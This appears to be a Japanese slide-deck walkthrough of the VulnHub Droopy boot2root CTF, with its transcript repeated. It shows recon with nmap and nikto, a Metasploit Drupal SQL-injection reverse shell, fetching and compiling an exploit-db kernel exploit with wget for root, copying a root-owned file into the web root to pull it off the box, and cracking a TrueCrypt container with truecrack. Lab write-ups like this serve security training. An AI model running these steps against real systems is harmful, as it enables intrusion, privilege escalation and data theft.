boot2root_kalilinux_droopy

サーバ侵入手法 Droopy CTF

DroopyVM ・インストール https://download.vulnhub.com/droopy/ ・フリーソフトウェアのCMS（コンテンツ・マネジメント・システム）のDrupal(ドル―パル)を構築している

Virtualbox ダウンロード https://www.virtualbox.org/wiki/Downloads

Virtualbox インポート

Virtualbox ネットワーク設定

Virtualbox スナップショット

ホスト検索 ①> nmap –sP 192.168.99.0/24 –sP： pingを利用してそのネットワークで現在動作しているマシンの一覧を取得する事が出来る

ポートスキャン ①> nmap -A 192.168.99.101 -A：OSの種類やその他詳細なバージョン情報などを取得可能

ポートスキャン 80番ポートでDrupalが起動しているのがわかりましたので、ブラウザでアクセスしてみましょう。

ポートスキャン

サーバスキャン ①> nikto –h 192.168.99.101 -h：対象のIPアドレスを指定するオプション

サーバスキャン nikto

解法 Metasploit framework

Metasploit framework drupalを使用してることがわかったので、 KaliLinuxにてMSFで攻撃を仕掛けてみる。

Metasploit framework 今回はSQLインジェクションを利用したペイロードを使用する (「set lhost ローカルホストIPアドレス」も必要かも)

Metaspliote framework 準備ができたら実行してリバースシェルを張りましょう。 shellコマンドでshellに入りましょう。

書き込み可能なディレクトリの漏洩 ①> find / -writable -type d 2>/dev/null -writable ：書き込み可能
-type d ：(d:ディレクトリ f:ファイル l:シンボリックリンク)

疑似端末疑似端末を割り当てましょう。疑似端末とは、UNIXにおけるテキスト端末の擬似デバイスのマスター・スレーブのペアである。 python の ptyモジュールを利用することで疑似端末を制御できます。 echo "import
pty; pty.spawn('/bin/bash')" > /tmp/asdf.py python /tmp/asdf.py

①> lsb_release -a Linux OSのディストリとバージョンを確認可能だがインストールされていないと使用できない。 ②> cat /etc/issue ディストリビューション環境に関係なくディストリとバージョン
を確認することが出来ます。 OS情報の漏洩

ubuntu 14.04 既存の脆弱性を悪用する

権限昇格 • cd /tmp/ • wget https://www.exlpoit-db.com/download/37292 （KaliでDLしたファイルをwgetしないといけない） • mv
37292 37292.c • gcc 37292.c -o kernel • chmod 777 kernel • ./kernel • whoami

tcファイルのダウンロード・cd /root ・ls -al ・cp /root/dave.tc /var/www/html/ ・Kaliでhttp://192.168.99.102/dave.tcにアクセス＆DL

tcファイル TrueCryptコンテナファイルは暗号化された仮想ドライブファイル。 3種類の暗号化アルゴリズムと3種類のハッシュアルゴリズムを選択できる。普段はコンピュータ上に表示されず、必要な時だけ認識される秘密のドライブ。暗号化ドライブの領域を「見せかけ」と「本命」に分割できる。このファイルのクラッキングツールとして「TrueCrack」が存在している。

TrueCrack ①> truecrack --truecrypt dave.tc --wordlist rockyou.txt --v erbose tcファイルのパスワードクラッキングが可能
--truecrypt [file]：tcファイルの指定 --wordlist [file]：ワードリストの指定 --verbose：詳細情報の出力 https://github.com/lvaccaro/truecrack

TrueCrack rockyou.txtはワード数が多すぎるためヒントを元にワードを絞って実施する必要がある。さらに、暗号化アルゴリズムの指定（-eオプション）やハッシュアルゴリズムの指定（-kオプション）を上手く利用する必要がありました。（デフォルトだとAESでRIPEMD-160です）ヒントは/var/mail/www-dataにありました。 "The password isn't
longer than 11 characters" "we know what academy we went to" "remember that song by The Jam"

TrueCrack

cryptsetup • cryptsetup open --type tcrypt dave.tc dave • mkdir
/media/dave • mount /dev/mapper/dave /media/dave • cd /media/dev • find . • cat .secret/.top/flag.txt

boot2root_kalilinux_droopy

boot2root_kalilinux_droopy

MarkUP

More Decks by MarkUP

Featured

Transcript

サーバ侵入手法 Droopy CTF

DroopyVM ・インストール https://download.vulnhub.com/droopy/ ・フリーソフトウェアのCMS（コンテンツ・マネジメント・システム）のDrupal(ドル―パル)を構築している

Virtualbox ダウンロード https://www.virtualbox.org/wiki/Downloads

Virtualbox インポート

Virtualbox ネットワーク設定

Virtualbox ネットワーク設定

Virtualbox スナップショット

ホスト検索 ①> nmap –sP 192.168.99.0/24 –sP： pingを利用してそのネットワークで現在動作しているマシンの一覧を取得する事が出来る

ポートスキャン ①> nmap -A 192.168.99.101 -A：OSの種類やその他詳細なバージョン情報などを取得可能

ポートスキャン 80番ポートでDrupalが起動しているのがわかりましたので、ブラウザでアクセスしてみましょう。

ポートスキャン

サーバスキャン ①> nikto –h 192.168.99.101 -h：対象のIPアドレスを指定するオプション

サーバスキャン nikto

解法 Metasploit framework

Metasploit framework drupalを使用してることがわかったので、 KaliLinuxにてMSFで攻撃を仕掛けてみる。

Metasploit framework 今回はSQLインジェクションを利用したペイロードを使用する (「set lhost ローカルホストIPアドレス」も必要かも)

Metaspliote framework 準備ができたら実行してリバースシェルを張りましょう。 shellコマンドでshellに入りましょう。

書き込み可能なディレクトリの漏洩 ①> find / -writable -type d 2>/dev/null -writable ：書き込み可能

疑似端末疑似端末を割り当てましょう。疑似端末とは、UNIXにおけるテキスト端末の擬似デバイスのマスター・スレーブのペアである。 python の ptyモジュールを利用することで疑似端末を制御できます。 echo "import

①> lsb_release -a Linux OSのディストリとバージョンを確認可能だがインストールされていないと使用できない。 ②> cat /etc/issue ディストリビューション環境に関係なくディストリとバージョン

ubuntu 14.04 既存の脆弱性を悪用する

権限昇格 • cd /tmp/ • wget https://www.exlpoit-db.com/download/37292 （KaliでDLしたファイルをwgetしないといけない） • mv

tcファイルのダウンロード・cd /root ・ls -al ・cp /root/dave.tc /var/www/html/ ・Kaliでhttp://192.168.99.102/dave.tcにアクセス＆DL

TrueCrack ①> truecrack --truecrypt dave.tc --wordlist rockyou.txt --v erbose tcファイルのパスワードクラッキングが可能

TrueCrack

cryptsetup • cryptsetup open --type tcrypt dave.tc dave • mkdir